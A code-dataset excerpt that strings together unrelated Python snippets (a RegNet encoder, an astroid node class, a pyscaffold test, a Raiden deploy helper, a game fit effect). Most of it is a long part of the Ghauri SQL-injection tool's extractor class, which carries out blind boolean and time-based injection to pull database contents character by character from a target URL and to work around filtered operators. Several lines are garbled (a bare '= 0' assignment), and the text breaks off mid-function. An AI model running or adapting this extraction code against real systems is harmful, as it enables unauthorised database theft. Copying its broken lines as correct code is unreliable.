code stringlengths 281 23.7M |
|---|
class RegNetEncoder(nn.Module):
def __init__(self, config: RegNetConfig):
super().__init__()
self.stages = nn.ModuleList([])
self.stages.append(RegNetStage(config, config.embedding_size, config.hidden_sizes[0], stride=(2 if config.downsample_in_first_stage else 1), depth=config.depths[0]))
in_out_channels = zip(config.hidden_sizes, config.hidden_sizes[1:])
for ((in_channels, out_channels), depth) in zip(in_out_channels, config.depths[1:]):
self.stages.append(RegNetStage(config, in_channels, out_channels, depth=depth))
def forward(self, hidden_state: Tensor, output_hidden_states: bool=False, return_dict: bool=True) -> BaseModelOutputWithNoAttention:
hidden_states = (() if output_hidden_states else None)
for stage_module in self.stages:
if output_hidden_states:
hidden_states = (hidden_states + (hidden_state,))
hidden_state = stage_module(hidden_state)
if output_hidden_states:
hidden_states = (hidden_states + (hidden_state,))
if (not return_dict):
return tuple((v for v in [hidden_state, hidden_states] if (v is not None)))
return BaseModelOutputWithNoAttention(last_hidden_state=hidden_state, hidden_states=hidden_states) |
class AugAssign(_base_nodes.AssignTypeNode, _base_nodes.OperatorNode, _base_nodes.Statement):
_astroid_fields = ('target', 'value')
_other_fields = ('op',)
target: ((Name | Attribute) | Subscript)
value: NodeNG
def __init__(self, op: str, lineno: int, col_offset: int, parent: NodeNG, *, end_lineno: (int | None), end_col_offset: (int | None)) -> None:
self.op = op
super().__init__(lineno=lineno, col_offset=col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset, parent=parent)
def postinit(self, target: ((Name | Attribute) | Subscript), value: NodeNG) -> None:
self.target = target
self.value = value
assigned_stmts = protocols.assign_assigned_stmts
def type_errors(self, context: (InferenceContext | None)=None):
try:
results = self._infer_augassign(context=context)
return [result for result in results if isinstance(result, util.BadBinaryOperationMessage)]
except InferenceError:
return []
def get_children(self):
(yield self.target)
(yield self.value)
def _get_yield_nodes_skip_functions(self):
(yield from self.value._get_yield_nodes_skip_functions())
(yield from super()._get_yield_nodes_skip_functions())
def _get_yield_nodes_skip_lambdas(self):
(yield from self.value._get_yield_nodes_skip_lambdas())
(yield from super()._get_yield_nodes_skip_lambdas())
def _infer_augassign(self, context: (InferenceContext | None)=None) -> Generator[((InferenceResult | util.BadBinaryOperationMessage), None, None)]:
context = (context or InferenceContext())
rhs_context = context.clone()
lhs_iter = self.target.infer_lhs(context=context)
rhs_iter = self.value.infer(context=rhs_context)
for (lhs, rhs) in itertools.product(lhs_iter, rhs_iter):
if any((isinstance(value, util.UninferableBase) for value in (rhs, lhs))):
(yield util.Uninferable)
return
try:
(yield from self._infer_binary_operation(left=lhs, right=rhs, binary_opnode=self, context=context, flow_factory=self._get_aug_flow))
except _NonDeducibleTypeHierarchy:
(yield util.Uninferable)
_if_nothing_inferred
_wrapper
def _infer(self: nodes.AugAssign, context: (InferenceContext | None)=None, **kwargs: Any) -> Generator[(InferenceResult, None, None)]:
return self._filter_operation_errors(self._infer_augassign, context, util.BadBinaryOperationMessage) |
def test_update_none_param(tmpfolder):
invalid = ' [metadata]\n [pyscaffold]\n version = 4\n '
Path(tmpfolder, 'setup.cfg').write_text(dedent(invalid))
extensions = [Object(name='x_foo_bar_x', persist=True)]
(_, opts) = actions.get_default_options({}, {'extensions': extensions})
opts['x_foo_bar_x_param'] = None
update.update_setup_cfg({}, opts)
assert Path(tmpfolder, 'setup.cfg').read_text() |
def deploy_one_to_n(user_deposit_deploy_result: Callable[([], UserDeposit)], service_registry_deploy_result: Callable[([], ServiceRegistry)], deploy_client: JSONRPCClient, contract_manager: ContractManager, proxy_manager: ProxyManager, chain_id: ChainID) -> OneToN:
user_deposit_proxy = user_deposit_deploy_result()
service_registry_proxy = service_registry_deploy_result()
(contract, receipt) = deploy_client.deploy_single_contract(contract_name=CONTRACT_ONE_TO_N, contract=contract_manager.get_contract(CONTRACT_ONE_TO_N), constructor_parameters=[user_deposit_proxy.address, chain_id, service_registry_proxy.address])
return proxy_manager.one_to_n(OneToNAddress(to_canonical_address(contract.address)), BlockNumber(receipt['blockNumber'])) |
class Effect91(BaseEffect):
type = 'passive'
def handler(fit, module, context, projectionRange, **kwargs):
fit.modules.filteredItemMultiply((lambda mod: (mod.item.group.name == 'Energy Weapon')), 'damageMultiplier', module.getModifiedItemAttr('damageMultiplier'), stackingPenalties=True, **kwargs) |
class GhauriExtractor():
def __init__(self, vectors='', is_string=False, skip_urlencoding=False, filepaths=None):
self.vectors = vectors
self.is_string = is_string
self.skip_urlencoding = skip_urlencoding
self.filepaths = filepaths
def _check_operator(self, url, data, vector, parameter, headers, base, injection_type, proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack01=None, match_string=None, not_match_string=None, vector_type=None, text_only=False, retry=3):
GuessUsing = collections.namedtuple('GuessUsing', ['ok', 'binary_search', 'in_based_search', 'linear_search', 'between_based_search', 'msg'])
binary_search = False
in_based_search = False
linear_search = False
between_based_search = False
retry_on_error = 0
= 0
timesec = conf.timesec
error_msg = None
_temp = GuessUsing(ok=False, binary_search=binary_search, in_based_search=in_based_search, linear_search=linear_search, between_based_search=between_based_search, msg=None)
expressions = [{'expression': vector.replace('[INFERENCE]', '6590>6420').replace('[SLEEPTIME]', f'{timesec}'), 'type': 'binary_search'}, {'expression': vector.replace('[INFERENCE]', '6590 NOT BETWEEN 0 AND 6420').replace('[SLEEPTIME]', f'{timesec}'), 'type': 'between_based_search'}, {'expression': vector.replace('[INFERENCE]', '(SELECT(45))IN(10,45,60)').replace('[SLEEPTIME]', f'{timesec}'), 'type': 'in_based_search'}, {'expression': vector.replace('[INFERENCE]', '09845=9845').replace('[SLEEPTIME]', f'{timesec}'), 'type': 'linear_search'}]
start = 0
operators = {'greater': 'binary_search', 'between': 'between_based_search', 'in': 'in_based_search', 'equal': 'linear_search'}
operator = None
if (conf.fetch_using and (conf.fetch_using in list(operators.keys()))):
operator = operators.get(conf.fetch_using, None)
if operator:
logger.debug(f"Ghauri will based data retrieval using '{conf.fetch_using}' openator")
end = len(expressions)
while (start < end):
entry = expressions[start]
expression = entry.get('expression')
_type = entry.get('type')
if (operator and (_type != operator)):
start += 1
continue
logger.payload(f'{expression}')
if (retry_on_error >= conf.retry):
start += 1
if (delay > 0):
time.sleep(delay)
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
logger.debug(f'sleep time: {timesec}, response time: {attack.response_time}')
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, match_string=match_string)
result = bool_retval.vulnerable
if result:
if (_type == 'binary_search'):
_temp = GuessUsing(ok=True, binary_search=True, in_based_search=in_based_search, linear_search=linear_search, between_based_search=between_based_search, msg='')
if (_type == 'between_based_search'):
msg = "it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on BETWEEN operator"
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=in_based_search, linear_search=linear_search, between_based_search=True, msg=msg)
if (_type == 'in_based_search'):
msg = ("it appears that the character '>' and 'BETWEEN' operator is filtered by the back-end server. ghauri will based data retrieval on IN() operator",)
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=True, linear_search=linear_search, between_based_search=between_based_search, msg=msg)
if (_type == 'linear_search'):
msg = ("it appears that the character '>' and the operator(s) 'IN, BETWEEN' are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",)
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=in_based_search, linear_search=True, between_based_search=between_based_search, msg=msg)
break
if (vector_type == 'time_vector'):
response_time = attack.response_time
if (response_time >= timesec):
if (_type == 'binary_search'):
_temp = GuessUsing(ok=True, binary_search=True, in_based_search=in_based_search, linear_search=linear_search, between_based_search=between_based_search, msg='')
if (_type == 'between_based_search'):
msg = "it appears that the character '>' is filtered by the back-end server. ghauri will based data retrieval on BETWEEN operator"
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=in_based_search, linear_search=linear_search, between_based_search=True, msg=msg)
if (_type == 'in_based_search'):
msg = ("it appears that the character '>' and 'BETWEEN' operator is filtered by the back-end server. ghauri will based data retrieval on IN() operator",)
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=True, linear_search=linear_search, between_based_search=between_based_search, msg=msg)
if (_type == 'linear_search'):
msg = ("it appears that the character '>' and the operator(s) 'IN, BETWEEN' are filtered by the back-end server. ghauri will based data retrieval on '=' operator, You are advised to use --delay=3 in this case",)
if conf.fetch_using:
msg = ''
_temp = GuessUsing(ok=True, binary_search=binary_search, in_based_search=in_based_search, linear_search=True, between_based_search=between_based_search, msg=msg)
break
start += 1
except KeyboardInterrupt as error:
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during operator check phase. Ghauri is going to retry')
retry_on_error += 1
if _temp.ok:
if _temp.msg:
logger.warning(_temp.msg)
return _temp
def validate_character(self, url, data, vector, parameter, headers, base, injection_type, proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack01=None, match_string=None, not_match_string=None, suppress_output=False, query_check=False, identified_character=None, vector_type=None, queryable=None, offset=None, expression_payload=None, text_only=False, retry=3, code=None, *args, **kwargs):
is_valid = False
retry_on_error = 0
= 0
error_msg = None
if identified_character:
for i in range(1, (retry + 1)):
if (delay > 0):
time.sleep(delay)
condition = expression_payload.format(query=queryable, position=offset, char=ord(identified_character))
if (vector_type == 'time_vector'):
if (conf.fetch_using and (conf.fetch_using.lower() == 'between')):
condition = replace_with(string=condition, character='=', replace_with=' NOT BETWEEN 0 AND ')
else:
condition = replace_with(string=condition, character='=', replace_with='!=')
if (vector_type == 'boolean_vector'):
if (conf.fetch_using and (conf.fetch_using.lower() == 'between')):
condition = replace_with(string=condition, character='=', replace_with=' BETWEEN 0 AND ')
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{timesec}')
sleep_time = conf.timesec
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
logger.debug(f'sleep time: {sleep_time}, response time: {attack.response_time}')
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, match_string=match_string, not_match_string=not_match_string, code=code, text_only=text_only)
result = bool_retval.vulnerable
if result:
is_valid = True
logger.debug('character is valid.')
if (vector_type == 'time_vector'):
response_time = attack.response_time
vulnerable = bool((response_time >= sleep_time))
if (not vulnerable):
logger.debug('character is valid.')
is_valid = True
break
except KeyboardInterrupt as error:
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
return is_valid
def _search_using_in_operator(self, url, data, vector, parameter, headers, base, injection_type, delay=0, timesec=5, timeout=30, proxy=None, attack01=None, code=None, match_string=None, not_match_string=None, text_only=False, is_multipart=False, suppress_output=False, query_check=False, minimum=None, maximum=None, offset=0, expression_payload=None, queryable=None, chars='', vector_type=None, retry=3, *args, **kwargs):
if (not minimum):
minimum = 32
if (not maximum):
maximum = 127
is_found = False
character = ''
= 0
error_msg = None
retry_on_error = 0
if (not conf.threads):
logger.progress(f'retrieved: {chars}')
if conf.threads:
chars = ''.join([str(i) for i in collections.OrderedDict(sorted(conf._thread_chars_query.items())).values()])
logger.progress(f'retrieved: {chars}')
sleep_time = conf.timesec
def chunks(lst, n):
for i in range(0, len(lst), n):
(yield lst[i:(i + n)])
gen = list(range(minimum, (maximum + 1)))
list_split_by = (26 if (len(gen) >= 26) else len(gen))
while (not is_found):
sorted_ascii_list = list(chunks(sorted([str(i) for i in range(minimum, (maximum + 1))]), list_split_by))
index = 0
while (index < len(sorted_ascii_list)):
if (delay > 0):
time.sleep(delay)
characters_list = sorted_ascii_list[index]
in_payload = (('(' + ','.join(characters_list)) + ')')
condition = expression_payload.format(query=queryable, position=offset, char=in_payload)
condition = replace_with(string=condition, character='=', replace_with='IN')
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{sleep_time}')
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
response_time = attack.response_time
logger.debug(f'sleep time: {sleep_time}, response time: {response_time}')
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, match_string=match_string, not_match_string=not_match_string, text_only=text_only)
result = bool_retval.vulnerable
if result:
characters_list = sorted([int(i) for i in characters_list])
minimum = characters_list[0]
maximum = characters_list[(- 1)]
list_split_by = (len(characters_list) // 2)
if (len(characters_list) == 1):
character = characters_list.pop()
character = chr(int(character))
if conf.threads:
conf._thread_chars_query.update({offset: character})
chars = ''.join([str(i) for i in collections.OrderedDict(conf._thread_chars_query.items()).values()])
logger.progress(f'retrieved: {chars}')
is_found = True
break
else:
index += 1
if (vector_type == 'time_vector'):
if (response_time >= sleep_time):
characters_list = sorted([int(i) for i in characters_list])
minimum = characters_list[0]
maximum = characters_list[(- 1)]
list_split_by = (len(characters_list) // 2)
if (len(characters_list) == 1):
character = characters_list.pop()
character = chr(int(character))
is_found = True
break
else:
index += 1
except KeyboardInterrupt as error:
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
return character
def _search_using_between_operator(self, url, data, vector, parameter, headers, base, injection_type, delay=0, timesec=5, timeout=30, proxy=None, attack01=None, code=None, match_string=None, not_match_string=None, text_only=False, is_multipart=False, suppress_output=False, query_check=False, minimum=None, maximum=None, offset=0, expression_payload=None, queryable=None, chars='', vector_type=None, retry=3, *args, **kwargs):
if (not minimum):
minimum = 32
if (not maximum):
maximum = 127
ascii_char = 0
is_found = False
character = ''
= 0
error_msg = None
retry_on_error = 0
if (not conf.threads):
logger.progress(f'retrieved: {chars}')
if conf.threads:
chars = ''.join([str(i) for i in collections.OrderedDict(sorted(conf._thread_chars_query.items())).values()])
logger.progress(f'retrieved: {chars}')
sleep_time = conf.timesec
while (not is_found):
if (conf._readtimout_counter >= 3):
if conf.rto_warning:
if (not conf.rtom_warning):
choice = logger.read_input('Ghauri detected read timeout multiple time(s). Do you want to continue? [y/N] ')
if (choice == 'n'):
logger.end('ending')
exit(0)
conf.rtom_warning = True
if (not conf.rto_warning):
msgrto = ''
if (vector_type == 'time_vector'):
msgrto = ", It is recommended to set high value of option(s) '--time-sec', increase delay between request(s) with an option '--delay'"
if (vector_type == 'boolean_vector'):
msgrto = ", It is recommended to set high value of option(s) '--timeout' and also increase delay between each http request with an option '--delay'"
logger.warning(f"Ghauri detected read timout '{conf._readtimout_counter}' time(s){msgrto}.")
conf.rto_warning = True
conf._readtimout_counter = 0
if (delay > 0):
time.sleep(delay)
ascii_char = int(((minimum + maximum) / 2))
if ((minimum == ascii_char) & (maximum == ascii_char)):
is_found = True
character = str(chr(ascii_char))
if (not conf.threads):
logger.progress(f'retrieved: {chars}{character}')
if conf.threads:
conf._thread_chars_query.update({offset: character})
chars = ''.join([str(i) for i in collections.OrderedDict(conf._thread_chars_query.items()).values()])
logger.progress(f'retrieved: {chars}')
break
condition = expression_payload.format(query=queryable, position=offset, char=ascii_char)
condition = replace_with(string=condition, character='=', replace_with=' NOT BETWEEN 0 AND ')
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{sleep_time}')
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
response_time = attack.response_time
logger.debug(f'sleep time: {sleep_time}, response time: {response_time}')
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, code=code, match_string=match_string, not_match_string=not_match_string, text_only=text_only)
result = bool_retval.vulnerable
if result:
minimum = (ascii_char + 1)
maximum = maximum
else:
minimum = minimum
maximum = ascii_char
if (vector_type == 'time_vector'):
if (response_time >= sleep_time):
minimum = (ascii_char + 1)
maximum = maximum
else:
minimum = minimum
maximum = ascii_char
except KeyboardInterrupt as error:
if conf.threads:
raise error
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
return character
def _binary_search(self, url, data, vector, parameter, headers, base, injection_type, delay=0, timesec=5, timeout=30, proxy=None, attack01=None, code=None, match_string=None, not_match_string=None, text_only=False, is_multipart=False, suppress_output=False, query_check=False, minimum=None, maximum=None, offset=0, expression_payload=None, queryable=None, chars='', vector_type=None, retry=3, *args, **kwargs):
if (not minimum):
minimum = 32
if (not maximum):
maximum = 127
ascii_char = 0
is_found = False
character = ''
= 0
error_msg = None
retry_on_error = 0
if (not conf.threads):
logger.progress(f'retrieved: {chars}')
if conf.threads:
chars = ''.join([str(i) for i in collections.OrderedDict(sorted(conf._thread_chars_query.items())).values()])
logger.progress(f'retrieved: {chars}')
sleep_time = conf.timesec
while (not is_found):
if (conf._readtimout_counter >= 3):
if conf.rto_warning:
if (not conf.rtom_warning):
choice = logger.read_input('Ghauri detected read timeout multiple time(s). Do you want to continue? [y/N] ')
if (choice == 'n'):
logger.end('ending')
exit(0)
conf.rtom_warning = True
if (not conf.rto_warning):
msgrto = ''
if (vector_type == 'time_vector'):
msgrto = ", It is recommended to set high value of option(s) '--time-sec', increase delay between request(s) with an option '--delay'"
if (vector_type == 'boolean_vector'):
msgrto = ", It is recommended to set high value of option(s) '--timeout' and also increase delay between each http request with an option '--delay'"
logger.warning(f"Ghauri detected read timout '{conf._readtimout_counter}' time(s){msgrto}.")
conf.rto_warning = True
conf._readtimout_counter = 0
if (delay > 0):
time.sleep(delay)
ascii_char = int(((minimum + maximum) / 2))
if ((minimum == ascii_char) & (maximum == ascii_char)):
is_found = True
character = str(chr(ascii_char))
if (not conf.threads):
logger.progress(f'retrieved: {chars}{character}')
if conf.threads:
conf._thread_chars_query.update({offset: character})
chars = ''.join([str(i) for i in collections.OrderedDict(conf._thread_chars_query.items()).values()])
logger.progress(f'retrieved: {chars}')
break
condition = expression_payload.format(query=queryable, position=offset, char=ascii_char)
condition = replace_with(string=condition, character='=', replace_with='>')
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{sleep_time}')
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
response_time = attack.response_time
logger.debug(f'sleep time: {sleep_time}, response time: {response_time}')
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, code=code, match_string=match_string, not_match_string=not_match_string, text_only=text_only)
result = bool_retval.vulnerable
if result:
minimum = (ascii_char + 1)
maximum = maximum
else:
minimum = minimum
maximum = ascii_char
if (vector_type == 'time_vector'):
if (response_time >= sleep_time):
minimum = (ascii_char + 1)
maximum = maximum
else:
minimum = minimum
maximum = ascii_char
except KeyboardInterrupt as error:
if conf.threads:
raise error
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
return character
def _linear_search(self, url, data, vector, parameter, headers, injection_type, proxy=None, attack01=None, is_multipart=False, timeout=30, delay=0, timesec=5, match_string=None, not_match_string=None, text_only=False, suppress_output=False, expression_payload=None, queryable=None, chars='', offset=0, list_of_chars=None, vector_type=None, retry=3, base=None, *args, **kwargs):
character = ''
start = 0
end = len(list_of_chars)
= 0
error_msg = None
retry_on_error = 0
sleep_time = conf.timesec
while (start < end):
ascii_char = list_of_chars[start]
if (delay > 0):
time.sleep(delay)
logger.progress(f'retrieved: {chars}{ascii_char}')
condition = expression_payload.format(query=queryable, position=offset, char=ord(ascii_char))
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{sleep_time}')
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
start += 1
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, match_string=match_string, not_match_string=not_match_string, text_only=text_only)
result = bool_retval.vulnerable
if result:
character += str(ascii_char)
break
if (vector_type == 'time_vector'):
response_time = attack.response_time
logger.debug(f'sleep time: {sleep_time}, response time: {response_time}')
if (response_time >= sleep_time):
character += str(ascii_char)
break
except KeyboardInterrupt as error:
logger.warning('user aborted during data extraction phase')
quest = logger.read_input('how do you want to proceed? [(C)continue/(e)nd this phase/(q)uit] ', batch=False, user_input='C')
if (quest and (quest == 'e')):
raise error
if (quest and (quest == 'q')):
logger.error('user quit')
logger.end('ending')
exit(0)
except ConnectionAbortedError as e:
logger.critical(f'connection attempt to the target URL was aborted by the peer, Ghauri is going to retry')
retry_on_error += 1
except ConnectionRefusedError as e:
logger.critical(f'connection attempt to the target URL was refused by the peer. Ghauri is going to retry')
retry_on_error += 1
except ConnectionResetError as e:
logger.critical(f'connection attempt to the target URL was reset by the peer. Ghauri is going to retry')
retry_on_error += 1
except Exception as error:
logger.critical(f'error {error}, during detection phase. Ghauri is going to retry')
retry_on_error += 1
return character
def fetch_noc(self, url, data, vector, parameter, headers, base, injection_type, payloads, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack01=None, code=None, match_string=None, not_match_string=None, suppress_output=False, text_only=False, vector_type=None):
noc = 0
working_query = ''
logger.debug('fetching number of characters in length of query..')
chars_extraction_payloads = NUMBER_OF_CHARACTERS_PAYLOADS.get(backend)
if isinstance(chars_extraction_payloads, str):
chars_extraction_payloads = [chars_extraction_payloads]
for value in chars_extraction_payloads:
is_noc_payload_found = False
for entry in payloads:
is_noc_found = False
start_pos = 1
stop = 10
while (start_pos < stop):
if (delay > 0):
time.sleep(delay)
sleep_time = conf.timesec
condition = value.format(query=entry, char=start_pos)
expression = vector.replace('[INFERENCE]', f'{condition}').replace('[SLEEPTIME]', f'{sleep_time}')
logger.payload(f'{expression}')
try:
attack = inject_expression(url=url, data=data, proxy=proxy, delay=delay, timesec=timesec, timeout=timeout, headers=headers, parameter=parameter, expression=expression, is_multipart=is_multipart, injection_type=injection_type)
except KeyboardInterrupt as error:
logger.error('user aborted during number of characters in length query retrieval.')
logger.end('ending')
exit(0)
if (attack.status_code in [403, 406]):
logger.debug('moving towards next payload in a list as current payload is restricted by firewall.')
break
if (attack01 and (vector_type == 'boolean_vector')):
bool_retval = check_boolean_responses(base, attack, attack01, code=code, match_string=match_string, not_match_string=not_match_string, text_only=text_only)
result = bool_retval.vulnerable
if result:
working_query = entry
logger.debug(f'retrieved number of characters in length query {start_pos}')
noc = start_pos
is_noc_found = True
break
if (vector_type == 'time_vector'):
response_time = attack.response_time
logger.debug(f'sleep time: {sleep_time}, response time: {response_time}')
if (response_time >= sleep_time):
working_query = entry
logger.debug(f'retrieved number of characters in length query {start_pos}')
noc = start_pos
is_noc_found = True
break
start_pos += 1
if is_noc_found:
is_noc_payload_found = True
break
if is_noc_payload_found:
break
return (noc, working_query)
def fetch_length(self, url, data, vector, parameter, headers, base, injection_type, payloads, backend='', proxy=None, is_multipart=False, timeout=30, delay=0, timesec=5, attack01=None, code=None, match_string=None, not_match_string=None, suppress_output=False, query_check=False, text_only=False, vector_type=None):
(noc, _) = self.fetch_noc(url, data, vector, parameter, headers, base, injection_type, payloads=payloads, backend=backend, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, suppress_output=suppress_output, text_only=text_only, vector_type=vector_type)
if (query_check and (noc > 0)):
return _
if (noc < 1):
logger.debug("Ghauri couldn't determine the number if character(s) in length query")
length = 0
if (noc >= 1):
if (not suppress_output):
logger.info(f'retrieving the length of query output')
length_extraction_payloads = LENGTH_PAYLOADS.get(backend)
if isinstance(length_extraction_payloads, str):
length_extraction_payloads = [length_extraction_payloads]
attack_url = url
attack_data = data
attack_headers = headers
for value in length_extraction_payloads:
is_length_found = False
for entry in payloads:
chars = ''
pos = 1
total_number_of_characters = (noc + 1)
while (pos < total_number_of_characters):
if (attack01 and (vector_type == 'boolean_vector')):
try:
retval = self._binary_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, delay=delay, timesec=timesec, timeout=timeout, proxy=proxy, attack01=attack01, code=code, match_string=match_string, not_match_string=not_match_string, is_multipart=is_multipart, suppress_output=suppress_output, query_check=query_check, minimum=48, maximum=58, offset=pos, expression_payload=value, queryable=entry, chars=chars, text_only=text_only, vector_type=vector_type)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
if (not is_valid):
logger.warning('invalid character detected, retrying..')
retval = self._linear_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, injection_type=injection_type, proxy=proxy, attack01=attack01, is_multipart=is_multipart, timeout=timeout, match_string=match_string, not_match_string=not_match_string, text_only=text_only, delay=delay, timesec=timesec, suppress_output=suppress_output, expression_payload=value, queryable=entry, chars=chars, offset=pos, list_of_chars='', vector_type=vector_type, base=base)
if retval:
is_valid = self.validate_character(url=url, data=data, vector=vector, parameter=parameter, headers=headers, base=base, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, identified_character=retval, vector_type=vector_type, offset=pos, expression_payload=value, queryable=entry, code=code, match_string=match_string, not_match_string=not_match_string, attack01=attack01)
if is_valid:
pos += 1
chars += retval
logger.debug(f'character found: {chars}')
except KeyboardInterrupt:
is_length_found = True
length = 0
break
if (vector_type == 'time_vector'):
try:
retval = self._linear_search(url=url, data=data, vector=vector, parameter=parameter, headers=headers, injection_type=injection_type, proxy=proxy, is_multipart=is_multipart, timeout=timeout, delay=delay, timesec=timesec, suppress_output=suppress_output, expression_payload=value, queryable=entry, chars=chars, offset=pos, list_of_chars='', vector_type=vector_type)
pos += 1
chars += retval
logger.debug(f"character found: '{str(chars)}'")
